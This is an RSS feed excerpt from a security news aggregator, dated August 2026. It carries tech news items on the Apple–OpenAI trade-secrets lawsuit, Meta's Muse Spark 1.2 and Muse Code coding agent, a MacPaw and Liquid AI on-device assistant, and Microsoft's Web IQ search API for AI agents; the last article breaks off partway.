<title><![CDATA[OpenAI’s ‘Rotten to the core’ defense is its weakest play yet]]></title>
<description><![CDATA[Ancient Greek sophist Protagoras famously said, “There are two sides to every question.” But OpenAI’s latest attempt at reality distortion seems determined to narrow this dispute to just one. In its motion to reject Apple’s complaint, the company does not meaningfully acknowledge the criticisms l...]]></description>
<link>https://tsecurity.de/de/3708258/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3708258/nachrichtenportal/</guid>
<pubDate>Thu, 06 Aug 2026 15:21:39 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Ancient Greek sophist Protagoras famously said, “There are two sides to every question.” But OpenAI’s <a href="https://storage.courtlistener.com/recap/gov.uscourts.cand.474095/gov.uscourts.cand.474095.59.0.pdf" target="_blank" rel="noreferrer noopener">latest attempt at reality distortion</a> seems determined to narrow this dispute to just one. In its motion to reject <a href="https://www.computerworld.com/article/4195828/rotten-to-its-core-apple-files-an-explosive-lawsuit-against-openai.html">Apple’s complaint</a>, the company does not meaningfully acknowledge the criticisms levelled against it, preferring instead to recast the case as a grievance over talent retention and product-market failure.</p>



<h2 class="wp-block-heading"><strong>The filing</strong></h2>



<p class="wp-block-paragraph">In case you missed the news, <a href="https://www.independent.co.uk/tech/openai-apple-lawsuit-tradesecret-dismiss-b3028436.html" target="_blank" rel="noreferrer noopener">OpenAI filed a motion to the court</a> to dismiss Apple’s <a href="https://www.computerworld.com/article/4195828/rotten-to-its-core-apple-files-an-explosive-lawsuit-against-openai.html">recent lawsuit against it</a>. In that filing, OpenAI argued that, “Apple should not be permitted to use a baseless and pretextual lawsuit to make up for its shortcomings in the market for talent and retaining its employees, and its failures to integrate AI into its products.”</p>



<p class="wp-block-paragraph">The company’s dismissal claims Apple’s case was, “plainly filed without adequate investigation and built on selectively excerpted communications and ordinary conduct stripped of context,” adding, in a turn of phrase borrowed from Apple’s own complaint, that it is “rotten to its core.”</p>



<h2 class="wp-block-heading"><strong>The narratives can change</strong></h2>



<p class="wp-block-paragraph">As ever with litigation, these are allegations and counter-allegations rather than findings of fact. The value of the filings is that they show how each side wants the court, and the public, to understand the same disputed events. At the moment, we don’t yet know how Apple will respond to OpenAI’s response; it follows that company’s failed attempt to woo public opinion earlier in the week when it deployed what some see as a <a href="https://www.computerworld.com/article/4204910/apple-is-one-of-the-greatest-companies-of-all-time-says-openai.html">“cookie jar” defense</a>, arguing that Apple’s secrets only slipped out because the figurative jar lid was open.</p>



<p class="wp-block-paragraph">OpenAI likely hopes for more success with its latest attempt to defend itself against Apple’s claims it engaged in a coordinated attempt to obtain trade secrets through questionable recruitment practices.</p>



<p class="wp-block-paragraph">Central to the company’s counter-argument are its attempts to recharacterize some of Apple’s claims. For example, Apple alleges that one former staffer, Chang Liu, downloaded confidential files after leaving the company. OpenAI argues that Liu was instead attempting to help ex-colleagues who asked him for assistance. This is a useful example of the Protagorean frame: both companies are trying to extract different meanings from the same event.</p>



<h2 class="wp-block-heading"><strong>What the truth might be</strong></h2>



<p class="wp-block-paragraph">The courts will need to decide which version of events is closer to the truth. What is already clear is that OpenAI has been actively involved in recruiting Apple staff, including the <a href="https://openai.com/sam-and-jony/" target="_blank" rel="noreferrer noopener">services of former Chief Design Officer Jony Ive</a>, as it develops a product that, to a layman like me, sounds likely to compete with Apple hardware. OpenAI says those recruitments reflect Apple’s failure to retain its staff; Apple argues its competitor is using exfiltrated confidential information to guide its hiring. The court will need to decide that story as well.</p>



<p class="wp-block-paragraph">Ultimately, I don’t expect OpenAI’s efforts to have the court reject Apple’s lawsuit to succeed. <a href="https://www.computerworld.com/article/4198342/apple-widens-openai-trade-secrets-fight-with-preservation-orders.html">Apple is asking for discovery</a> precisely so it can test whether its reading of this distorted reality is supported by OpenAI’s internal procedures and the available facts. One of OpenAI’s arguments seems to be that Apple has not researched the matter thoroughly enough; Apple is quite literally requesting discovery to do just that.</p>



<h2 class="wp-block-heading"><strong>What happens next?</strong></h2>



<p class="wp-block-paragraph">I don’t know what discovery might turn up, but it does amuse me to think Apple could build its own large language model to boost the discovery process and identify communication conduits that might otherwise be obscured in the evidence initially available to it. How high, and in what direction, do OpenAI’s claimed recruitment practices go, and who is implicated in them? That’s something we might find out in the coming months.</p>



<p class="wp-block-paragraph">OpenAI’s Protagorean defense extends a little further, of course, as the company also said it had “no use, need or desire for Apple’s trade secrets” because it is building “something entirely new.” This may surprise Apple, which has already alleged that OpenAI contacted its <a href="https://www.applemust.com/openai-discovers-it-takes-time-not-just-design-to-build-great-hardware/#google_vignette" target="_blank" rel="noreferrer noopener">manufacturing partners</a> and sought access to secret manufacturing processes Apple developed with them.</p>



<p class="wp-block-paragraph">Once again, it will be up to the courts to decide whether those events took place, or if OpenAI’s defense has substance. Given that this dispute centers on product design and involves the AI company’s growing army of former Apple design and development staff, I find the denial hard to accept. But courts tend to make their own decisions, for good, or for ill. </p>



<h2 class="wp-block-heading"><strong>Fight or settle</strong></h2>



<p class="wp-block-paragraph">What happens next? I think this attempt to reject the original litigation will fail, which means the case will enter the discovery process before one of two outcomes becomes more likely: A bitter public battle that lasts for years and might well end up in the Supreme Court, or an out-of-court settlement shaped by which side gains the most compelling evidence.</p>



<p class="wp-block-paragraph">Like any war, there are really only two options: one side fights until the other can no longer continue, or both sides find a way to settle. The path to settlement may begin by recognizing that two stories can be applied to the same facts, and that the version closest to the truth often sits somewhere between them. I’m not a lawyer and I don’t have insider insight into the practicalities of the case, but based on what has been revealed so far, the most plausible combined story may be that Apple’s own vulnerabilities helped create an environment OpenAI chose to exploit. If so, Apple’s legal team will be searching hard for evidence of intent. </p>



<p class="wp-block-paragraph">I expect they’ll find it.</p>



<p class="wp-block-paragraph"><em>You can follow me on social media! Join me on <a href="https://bsky.app/profile/jonnyevanssays.bsky.social" target="_blank" rel="noreferrer noopener">BlueSky</a>,  <a href="http://www.linkedin.com/in/jonnyevans" target="_blank" rel="noreferrer noopener">LinkedIn</a>, <a href="https://social.vivaldi.net/@jonnyevans" target="_blank" rel="noreferrer noopener">Mastodon</a> and subscribe to <a href="https://thecorenews.substack.com/p/welcome-to-the-core?r=5l3lg" target="_blank" rel="noreferrer noopener">The Core</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[My 3 favorite AI tools for voice dictation while vibe coding - and one is free]]></title>
<description><![CDATA[I've tested the top AI voice tools to find which delivers the best accuracy, privacy, and corrections.]]></description>
<link>https://tsecurity.de/de/3708205/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3708205/nachrichtenportal/</guid>
<pubDate>Thu, 06 Aug 2026 15:14:05 +0200</pubDate>
<content:encoded><![CDATA[I've tested the top AI voice tools to find which delivers the best accuracy, privacy, and corrections.]]></content:encoded>
</item>
<item>
<title><![CDATA[My 3 favorite AI tools for voice dictation while vibe coding - and one is free]]></title>
<description><![CDATA[I've tested the top AI voice tools to find which delivers the best accuracy, privacy, and corrections.]]></description>
<link>https://tsecurity.de/de/3708159/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3708159/nachrichtenportal/</guid>
<pubDate>Thu, 06 Aug 2026 14:54:13 +0200</pubDate>
<content:encoded><![CDATA[I've tested the top AI voice tools to find which delivers the best accuracy, privacy, and corrections.]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI’s ‘Rotten to the core’ defense is its weakest play yet]]></title>
<description><![CDATA[Ancient Greek sophist Protagoras famously said, “There are two sides to every question.” But OpenAI’s latest attempt at reality distortion seems determined to narrow this dispute to just one. In its motion to reject Apple’s complaint, the company does not meaningfully acknowledge the criticisms l...]]></description>
<link>https://tsecurity.de/de/3708157/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3708157/nachrichtenportal/</guid>
<pubDate>Thu, 06 Aug 2026 14:54:10 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Ancient Greek sophist Protagoras famously said, “There are two sides to every question.” But OpenAI’s <a href="https://storage.courtlistener.com/recap/gov.uscourts.cand.474095/gov.uscourts.cand.474095.59.0.pdf" target="_blank" rel="noreferrer noopener">latest attempt at reality distortion</a> seems determined to narrow this dispute to just one. In its motion to reject <a href="https://www.computerworld.com/article/4195828/rotten-to-its-core-apple-files-an-explosive-lawsuit-against-openai.html">Apple’s complaint</a>, the company does not meaningfully acknowledge the criticisms levelled against it, preferring instead to recast the case as a grievance over talent retention and product-market failure.</p>



<h2 class="wp-block-heading"><strong>The filing</strong></h2>



<p class="wp-block-paragraph">In case you missed the news, <a href="https://www.independent.co.uk/tech/openai-apple-lawsuit-tradesecret-dismiss-b3028436.html" target="_blank" rel="noreferrer noopener">OpenAI filed a motion to the court</a> to dismiss Apple’s <a href="https://www.computerworld.com/article/4195828/rotten-to-its-core-apple-files-an-explosive-lawsuit-against-openai.html">recent lawsuit against it</a>. In that filing, OpenAI argued that, “Apple should not be permitted to use a baseless and pretextual lawsuit to make up for its shortcomings in the market for talent and retaining its employees, and its failures to integrate AI into its products.”</p>



<p class="wp-block-paragraph">The company’s dismissal claims Apple’s case was, “plainly filed without adequate investigation and built on selectively excerpted communications and ordinary conduct stripped of context,” adding, in a turn of phrase borrowed from Apple’s own complaint, that it is “rotten to its core.”</p>



<h2 class="wp-block-heading"><strong>The narratives can change</strong></h2>



<p class="wp-block-paragraph">As ever with litigation, these are allegations and counter-allegations rather than findings of fact. The value of the filings is that they show how each side wants the court, and the public, to understand the same disputed events. At the moment, we don’t yet know how Apple will respond to OpenAI’s response; it follows that company’s failed attempt to woo public opinion earlier in the week when it deployed what some see as a <a href="https://www.computerworld.com/article/4204910/apple-is-one-of-the-greatest-companies-of-all-time-says-openai.html">“cookie jar” defense</a>, arguing that Apple’s secrets only slipped out because the figurative jar lid was open.</p>



<p class="wp-block-paragraph">OpenAI likely hopes for more success with its latest attempt to defend itself against Apple’s claims it engaged in a coordinated attempt to obtain trade secrets through questionable recruitment practices.</p>



<p class="wp-block-paragraph">Central to the company’s counter-argument are its attempts to recharacterize some of Apple’s claims. For example, Apple alleges that one former staffer, Chang Liu, downloaded confidential files after leaving the company. OpenAI argues that Liu was instead attempting to help ex-colleagues who asked him for assistance. This is a useful example of the Protagorean frame: both companies are trying to extract different meanings from the same event.</p>



<h2 class="wp-block-heading"><strong>What the truth might be</strong></h2>



<p class="wp-block-paragraph">The courts will need to decide which version of events is closer to the truth. What is already clear is that OpenAI has been actively involved in recruiting Apple staff, including the <a href="https://openai.com/sam-and-jony/" target="_blank" rel="noreferrer noopener">services of former Chief Design Officer Jony Ive</a>, as it develops a product that, to a layman like me, sounds likely to compete with Apple hardware. OpenAI says those recruitments reflect Apple’s failure to retain its staff; Apple argues its competitor is using exfiltrated confidential information to guide its hiring. The court will need to decide that story as well.</p>



<p class="wp-block-paragraph">Ultimately, I don’t expect OpenAI’s efforts to have the court reject Apple’s lawsuit to succeed. <a href="https://www.computerworld.com/article/4198342/apple-widens-openai-trade-secrets-fight-with-preservation-orders.html">Apple is asking for discovery</a> precisely so it can test whether its reading of this distorted reality is supported by OpenAI’s internal procedures and the available facts. One of OpenAI’s arguments seems to be that Apple has not researched the matter thoroughly enough; Apple is quite literally requesting discovery to do just that.</p>



<h2 class="wp-block-heading"><strong>What happens next?</strong></h2>



<p class="wp-block-paragraph">I don’t know what discovery might turn up, but it does amuse me to think Apple could build its own large language model to boost the discovery process and identify communication conduits that might otherwise be obscured in the evidence initially available to it. How high, and in what direction, do OpenAI’s claimed recruitment practices go, and who is implicated in them? That’s something we might find out in the coming months.</p>



<p class="wp-block-paragraph">OpenAI’s Protagorean defense extends a little further, of course, as the company also said it had “no use, need or desire for Apple’s trade secrets” because it is building “something entirely new.” This may surprise Apple, which has already alleged that OpenAI contacted its <a href="https://www.applemust.com/openai-discovers-it-takes-time-not-just-design-to-build-great-hardware/#google_vignette" target="_blank" rel="noreferrer noopener">manufacturing partners</a> and sought access to secret manufacturing processes Apple developed with them.</p>



<p class="wp-block-paragraph">Once again, it will be up to the courts to decide whether those events took place, or if OpenAI’s defense has substance. Given that this dispute centers on product design and involves the AI company’s growing army of former Apple design and development staff, I find the denial hard to accept. But courts tend to make their own decisions, for good, or for ill. </p>



<h2 class="wp-block-heading"><strong>Fight or settle</strong></h2>



<p class="wp-block-paragraph">What happens next? I think this attempt to reject the original litigation will fail, which means the case will enter the discovery process before one of two outcomes becomes more likely: A bitter public battle that lasts for years and might well end up in the Supreme Court, or an out-of-court settlement shaped by which side gains the most compelling evidence.</p>



<p class="wp-block-paragraph">Like any war, there are really only two options: one side fights until the other can no longer continue, or both sides find a way to settle. The path to settlement may begin by recognizing that two stories can be applied to the same facts, and that the version closest to the truth often sits somewhere between them. I’m not a lawyer and I don’t have insider insight into the practicalities of the case, but based on what has been revealed so far, the most plausible combined story may be that Apple’s own vulnerabilities helped create an environment OpenAI chose to exploit. If so, Apple’s legal team will be searching hard for evidence of intent. </p>



<p class="wp-block-paragraph">I expect they’ll find it.</p>



<p class="wp-block-paragraph"><em>You can follow me on social media! Join me on <a href="https://bsky.app/profile/jonnyevanssays.bsky.social" target="_blank" rel="noreferrer noopener">BlueSky</a>,  <a href="http://www.linkedin.com/in/jonnyevans" target="_blank" rel="noreferrer noopener">LinkedIn</a>, <a href="https://social.vivaldi.net/@jonnyevans" target="_blank" rel="noreferrer noopener">Mastodon</a> and subscribe to <a href="https://thecorenews.substack.com/p/welcome-to-the-core?r=5l3lg" target="_blank" rel="noreferrer noopener">The Core</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[My 3 favorite AI tools for voice dictation while vibe coding - and one is free]]></title>
<description><![CDATA[I've tested the top AI voice tools to find which delivers the best accuracy, privacy, and corrections.]]></description>
<link>https://tsecurity.de/de/3708121/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3708121/nachrichtenportal/</guid>
<pubDate>Thu, 06 Aug 2026 14:53:33 +0200</pubDate>
<content:encoded><![CDATA[I've tested the top AI voice tools to find which delivers the best accuracy, privacy, and corrections.]]></content:encoded>
</item>
<item>
<title><![CDATA[The company that made open weights mainstream now competes on discounts]]></title>
<description><![CDATA[Meta released Muse Spark 1.2 along with its own coding agent, Muse Code, which is designed to pick up exactly where it left off after a crash. The cheapest tier runs just 20 cents per million output tokens but requires users to share their data for training. Meta is competing on price, not top-en...]]></description>
<link>https://tsecurity.de/de/3708107/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3708107/nachrichtenportal/</guid>
<pubDate>Thu, 06 Aug 2026 14:52:45 +0200</pubDate>
<content:encoded><![CDATA[<p><img width="1376" height="768" src="https://the-decoder.com/wp-content/uploads/2026/07/meta_AI_logo.png" class="attachment-full size-full wp-post-image" alt="" decoding="async" fetchpriority="high"></p>
<p>        Meta released Muse Spark 1.2 along with its own coding agent, Muse Code, which is designed to pick up exactly where it left off after a crash. The cheapest tier runs just 20 cents per million output tokens but requires users to share their data for training. Meta is competing on price, not top-end performance. And there's a glaring gap in the benchmarks.</p>
<p>The article <a href="https://the-decoder.com/the-company-that-made-open-weights-mainstream-now-competes-on-discounts/">The company that made open weights mainstream now competes on discounts</a> appeared first on <a href="https://the-decoder.com/">The Decoder</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Meta launches Muse Code for complex software work with persistent AI agents]]></title>
<description><![CDATA[Meta has released a beta coding agent designed to handle complex software assignments across large codebases.



Available for macOS and Linux, Muse Code uses the company’s new Muse Spark 1.2 model. It includes specialized background agents that remain active throughout a session instead of being...]]></description>
<link>https://tsecurity.de/de/3708019/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3708019/nachrichtenportal/</guid>
<pubDate>Thu, 06 Aug 2026 14:03:14 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Meta has released a beta coding agent designed to handle complex software assignments across large codebases.</p>



<p class="wp-block-paragraph">Available for macOS and Linux, Muse Code uses the company’s new Muse Spark 1.2 model. It includes specialized background agents that remain active throughout a session instead of being created separately for individual tasks.</p>



<p class="wp-block-paragraph">The agents carry out work asynchronously and decide when to report their findings to the primary agent. Meta said keeping them active reduces repeated information gathering and the need for developer direction during difficult, multi-step tasks.</p>



<p class="wp-block-paragraph">“Muse Code uses a local event log in which every model call, tool run, approval, and edit is appended,” Meta said in a post, adding that the record “makes the runtime replay-exact and restart-safe” and allows the agent to resume precisely where it stopped after a crash.</p>



<p class="wp-block-paragraph"><a href="https://www.infoworld.com/article/4192724/metas-ai-chief-says-new-muse-spark-update-will-sharpen-coding-agentic-ai.html">Muse Spark 1.2</a> is available through Muse Code and the Meta Model API, for which Meta announced expanded global access.</p>



<h2 class="wp-block-heading">Training and evaluation</h2>



<p class="wp-block-paragraph">Meta said it co-trained Muse Spark 1.2 with Muse Code to improve the model’s performance and usability when used with the agent. The training incorporated Muse Code’s tools and agent workflows, while Meta increased the computing resources used for coding and broadened the range of development environments.</p>



<p class="wp-block-paragraph">The model was also trained on longer assignments, including whole-repository generation and large end-to-end software projects.</p>



<p class="wp-block-paragraph"><a href="https://omdia.tech.informa.com/authors/lian-jye-su" target="_blank" rel="noreferrer noopener">Lian Jye Su</a>, chief analyst at Omdia, said Meta’s co-training approach was unlikely to provide a clear advantage because rivals were also developing their coding models and <a href="https://www.infoworld.com/article/4164601/harness-teams-of-coding-agents-with-squad.html">agent harnesses</a> in close coordination.</p>



<p class="wp-block-paragraph">“Other vendors, such as OpenAI and Anthropic, have been treating harness engineering as part of the training process,” Su said.</p>



<p class="wp-block-paragraph">Optimizing the model and agent together could improve planning and context handling, but any competitive advantage would need to be demonstrated through better results on enterprise projects while reducing the need for human intervention, said <a href="https://pareekh.com/" target="_blank" rel="noreferrer noopener">Pareekh Jain</a>, CEO of Pareekh Consulting.</p>



<p class="wp-block-paragraph">Meta reported that Muse Spark 1.2 achieved an 82.9% pass@1 score on Terminal-Bench 2.1, behind Claude Opus 5 but slightly ahead of GPT-5.6 Terra. On DeepSWE 1.1, the model scored 59.3%, trailing both rivals.</p>



<p class="wp-block-paragraph">For Terminal-Bench 2.1 and DeepSWE 1.1, Meta evaluated each model with its selected coding agent rather than using the same agent throughout. It also acknowledged that rival proprietary models may have performed differently under tools and prompts designed specifically for them.</p>



<p class="wp-block-paragraph"><a href="https://counterpointresearch.com/en/opinion-leader/10" target="_blank" rel="noreferrer noopener">Neil Shah</a>, vice president of research at Counterpoint Research, said cross-vendor comparisons would be more meaningful if models were evaluated with third-party tools or within the same agent harness.</p>



<p class="wp-block-paragraph">“The key metric for CIOs is the pass rate against an enterprise’s own pipeline, which will determine the success of the model-and-harness bundle, or, in this case, Meta’s Muse Spark 1.2 and Muse Code,” Shah said. “This will be the real <a href="https://www.infoworld.com/article/4033758/why-benchmarks-are-key-to-ai-progress.html">benchmark</a>.”</p>



<h2 class="wp-block-heading">Enterprise adoption hurdles</h2>



<p class="wp-block-paragraph">Su said security and governance requirements could slow enterprise adoption, particularly where coding agents must be connected to existing identity systems.</p>



<p class="wp-block-paragraph">“Many enterprises are still less willing to open up their CI/CD environments for AI tool integration,” Su said.</p>



<p class="wp-block-paragraph">Shah said companies would need controls governing how agents access repositories, along with records showing how models and agent workflows handle enterprise data. He also cited the difficulty of forecasting token consumption and its effect on costs.</p>



<p class="wp-block-paragraph">Meta’s pricing structure also creates a data-governance choice. The company said the lower-priced Contributor model may be used to improve its products, while the standard tier is not used for that purpose.</p>



<p class="wp-block-paragraph">The Contributor tier costs $0.10 per million input tokens and $0.20 per million output tokens, compared with $1.25 and $4.25, respectively, for the standard tier.</p>



<p class="wp-block-paragraph">“There is also a fear of vendor lock-in and reliance, as it may hurt long-term flexibility and system interoperability,” Su added.</p>



<p class="wp-block-paragraph">Jain said adoption was likely to begin with narrowly defined, lower-risk work before companies allowed persistent agents to modify critical production code.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[MacPaw Partners With Liquid AI To Build Local Assistant Tools]]></title>
<description><![CDATA[MacPaw is teaming up with Liquid AI to build a new on-device assistant layer tailored specifically for Apple computers. The software developer wants to keep your data local instead of sending it to the cloud. By building a shared technology stack from the ground up, MacPaw aims to make its macOS ...]]></description>
<link>https://tsecurity.de/de/3707998/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3707998/nachrichtenportal/</guid>
<pubDate>Thu, 06 Aug 2026 13:59:22 +0200</pubDate>
<content:encoded><![CDATA[MacPaw is teaming up with Liquid AI to build a new on-device assistant layer tailored specifically for Apple computers. The software developer wants to keep your data local instead of sending it to the cloud. By building a shared technology stack from the ground up, MacPaw aims to make its macOS assistant named Eney much smarter.



The firm's goal is to let the tool operate natively on your Mac while keeping your conversation history and personal search data secure.



The shared technology stack will expand to other developer apps



The partnership relies on adapting Liquid Foundation Models for regular desktop use. These tools will join the memory and inference features MacPaw already has, which are called Mnemos and Elix. Eney moved to a local setup last year so it could handle reasoning and run tasks directly on your computer.



Now, the company is pushing that boundary further. Rather than just plugging in an external model, the two groups are creating a custom AI foundation together. Once the new system is tested and ready, MacPaw plans to integrate the technology into more of its products. It also wants to share this custom artificial intelligence setup with other developers through the Setapp platform.



This move means participating apps could open up their inner workings and share context with Eney. If an application exposes its capabilities to the assistant, Eney will understand what is happening inside that specific program. It can then offer helpful answers or take direct actions for the user without needing an internet connection.



Instead of relying on remote servers that process your data out of sight, this local approach keeps control in your hands. It shows a growing trend where desktop software prioritizes privacy and speed by keeping tasks on the machine itself.]]></content:encoded>
</item>
<item>
<title><![CDATA[15 Advanced MySQL Database Interview Questions and Answers]]></title>
<description><![CDATA[The post 15 Advanced MySQL Database Interview Questions and Answers first appeared on Tecmint: Linux Howtos, Tutorials & Guides .Much of the MySQL interview prep you’ll find online is based on outdated versions that reached end-of-life years ago. If
The post 15 Advanced MySQL Database Interview Q...]]></description>
<link>https://tsecurity.de/de/3707993/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3707993/nachrichtenportal/</guid>
<pubDate>Thu, 06 Aug 2026 13:54:05 +0200</pubDate>
<content:encoded><![CDATA[The post <a href="https://www.tecmint.com/mysql-advance-interview-questions/">15 Advanced MySQL Database Interview Questions and Answers</a> first appeared on <a href="https://www.tecmint.com/">Tecmint: Linux Howtos, Tutorials &amp; Guides</a> .<p>Much of the MySQL interview prep you’ll find online is based on outdated versions that reached end-of-life years ago. If</p>
The post <a href="https://www.tecmint.com/mysql-advance-interview-questions/">15 Advanced MySQL Database Interview Questions and Answers</a> first appeared on <a href="https://www.tecmint.com/">Tecmint: Linux Howtos, Tutorials &amp; Guides</a>.]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft Web IQ: Ground your AI agents with up-to-date web data]]></title>
<description><![CDATA[Microsoft has unveiled a suite of IQ products over the last few months. Work IQ, Fabric IQ, and Foundry IQ build on what Microsoft used to call its “Graphs,” the underlying data architecture that underpins its cloud services. These graphs provided a way to query the data your business uses, treat...]]></description>
<link>https://tsecurity.de/de/3707919/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3707919/nachrichtenportal/</guid>
<pubDate>Thu, 06 Aug 2026 13:18:55 +0200</pubDate>
<content:encoded><![CDATA[<div><div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Microsoft has unveiled <a href="https://www.microsoft.com/en-us/ai/microsoft-iq#Products">a suite of IQ products</a> over the last few months. Work IQ, Fabric IQ, and Foundry IQ build on what Microsoft used to call its “Graphs,” the underlying data architecture that underpins its cloud services. These graphs provided a way to query the data your business uses, treating that data as nodes in a graph database and using the <a href="https://www.infoworld.com/article/2267992/what-is-graphql-better-apis-by-design.html" data-type="link" data-id="https://www.infoworld.com/article/2267992/what-is-graphql-better-apis-by-design.html">GraphQL API model</a> to extract that data — for example, to pull data related to a specific individual held across the various Microsoft 365 applications.</p>



<p class="wp-block-paragraph">The IQ suite follows a similar approach, using the same data, but treating it as the sparse vector store needed to provide grounding data for <a href="https://www.infoworld.com/article/2335213/large-language-models-the-foundations-of-generative-ai.html" data-type="link" data-id="https://www.infoworld.com/article/2335213/large-language-models-the-foundations-of-generative-ai.html">LLM</a>-based applications. By treating the data as a set of <a href="https://www.infoworld.com/article/2335281/vector-databases-in-llms-and-search.html" data-type="link" data-id="https://www.infoworld.com/article/2335281/vector-databases-in-llms-and-search.html">embedding vectors</a>, and integrating it with <a href="https://www.infoworld.com/article/4029634/what-is-model-context-protocol-how-mcp-bridges-ai-and-external-services.html" data-type="link" data-id="https://www.infoworld.com/article/4029634/what-is-model-context-protocol-how-mcp-bridges-ai-and-external-services.html">Model Context Protocol</a> (MCP) servers, Microsoft is giving you the necessary tools to tie LLM output to your data, reducing the risk of hallucination and improving accuracy. Using your own data is a key part of delivering effective agents, ensuring they work within your constraints.</p>



<h2 class="wp-block-heading">Extending IQ to the web</h2>



<p class="wp-block-paragraph"><a href="https://www.microsoft.com/en-us/webiq" data-type="link" data-id="https://www.microsoft.com/en-us/webiq">Web IQ</a>, the latest member of the IQ suite, was unveiled at Build 2026. A modernization of the retired Bing Search APIs, <a href="https://webiq.microsoft.ai/documentation/overview/">Web IQ is an agent-focused web search tool</a> that builds on the massive Bing search index to provide up-to-date general information for use in your applications.</p>



<p class="wp-block-paragraph">It may seem a little odd to be talking about a web-wide source of grounding data in the context of a suite of tools that exist to improve the accuracy of your AI applications by providing access to your Microsoft-hosted data. However, in many cases you want to link your agent not only to your data but also to related information from the wider world. For example, an agent powering an ecommerce service could use Web IQ and web-based data sources to provide product comparisons. An agent managing stock levels for a product that is weather-sensitive could use Web IQ as a source of weather data, using Bing’s multiple weather feeds and forecasts.</p>



<p class="wp-block-paragraph">Just as Google Gemini drew on Google Search, Microsoft Copilot began by using Bing search data to provide grounding for consumer chatbots. It’s easy to take a service like Bing and use it with a LLM, as the nearest neighbor search algorithms use semantic vector similarity techniques to find results that look like your query, ranking them according to their proximity to your search terms.</p>



<p class="wp-block-paragraph">Microsoft has been tuning its search vector index and the underlying technology stack to work with agents, as agents operate much differently than humans searching the web or querying a chatbot. Providing web search capabilities to agents means having to deal with persistent queries, as the agent hunts for the information it needs, refining queries and applying reasoning algorithms to develop the response it needs. LLM inferencing requires quick responses that deliver large amounts of data, working with queries that go far beyond the one-word or two-word requests that are typical of humans.</p>



<h2 class="wp-block-heading">More than the training weights</h2>



<p class="wp-block-paragraph">Using Web IQ gives you access to up-to-date information, beyond the training data used to build and weight an LLM. Bing’s crawler works within the standards developed by the search engine industry, obeying meta tags and using its own algorithms to crawl regularly updated websites more often. Bing’s crawler ensures that data is both fresh and being used appropriately, with a focus on quality rather than quantity.</p>



<p class="wp-block-paragraph">Providing access to web data is only part of Web IQ. Microsoft is using Web IQ to host its own models to manage embeddings, ranking, and content extraction, all running on the company’s global hyperscale platform. The intent here is to use only a limited number of models, to keep the system performance high while aiming to deliver accurate results. The Web IQ models are different from those used to deliver search results to humans, as they’re designed to deliver responses that are suitable for LLMs to use for reasoning.</p>



<p class="wp-block-paragraph">The underlying search system is based on the <a href="https://www.microsoft.com/en-us/research/project/project-akupara-approximate-nearest-neighbor-search-for-large-scale-semantic-search/" data-type="link" data-id="https://www.microsoft.com/en-us/research/project/project-akupara-approximate-nearest-neighbor-search-for-large-scale-semantic-search/">DiskANN algorithm</a> developed by Microsoft Research, which allows fast search without requiring enormous amounts of in-memory data access. This approach has been extended to manage information retrieval at scale, building on Microsoft’s distributed systems architectures, to support the demands Microsoft is seeing from agent-based systems. At the same time, it must respond to the rapidly changing economics of inference, where token costs now demand the best possible output from the fewest tokens.</p>



<p class="wp-block-paragraph">To meet those economic demands, the Web IQ platform doesn’t deliver whole documents to querying agents. Whole documents can lead to expensive inference further down the chain, as LLMs process results repeatedly to drive the agent workflow. Instead, Web IQ structures the information retrieved from the underlying search engine data, delivering what Microsoft calls “structured evidence objects” as well as passage-level information from unstructured text documents. This should result in a much higher signal-to-noise ratio than simply querying a search engine, with a focus on delivering information that lets agents work using fewer tokens.</p>



<h2 class="wp-block-heading">Using Web IQ in your agent code</h2>



<p class="wp-block-paragraph"><a href="https://webiq.microsoft.ai/documentation/api-reference/web/">The API for Web IQ</a> is a standard REST cal<a href="https://webiq.microsoft.ai/documentation/api-reference/web/">l</a>, delivering a request object to the Web IQ endpoint. Along with your API authorization key, you will send a query, a set of parameters that control the number of results returned, the language and region used, and the maximum size of the responses and the format used. Responses can be returned in text, HTML, or markdown formats, as well as extracted passages that are selected for context. All other options return the full document, so can be more expensive to use. Markdown is an interesting alternative, as it can be used as the basis for giving agents semantic memories.</p>



<p class="wp-block-paragraph">Results include important contextual and citation information, including web page titles and URLs, as well as data about when the site was last crawled and how stale the underlying information is. This can be used to improve grounding and provide more information that can be included in formatted responses — much in the same way as Bing’s Copilot displays context in the form of footnotes in its responses.</p>



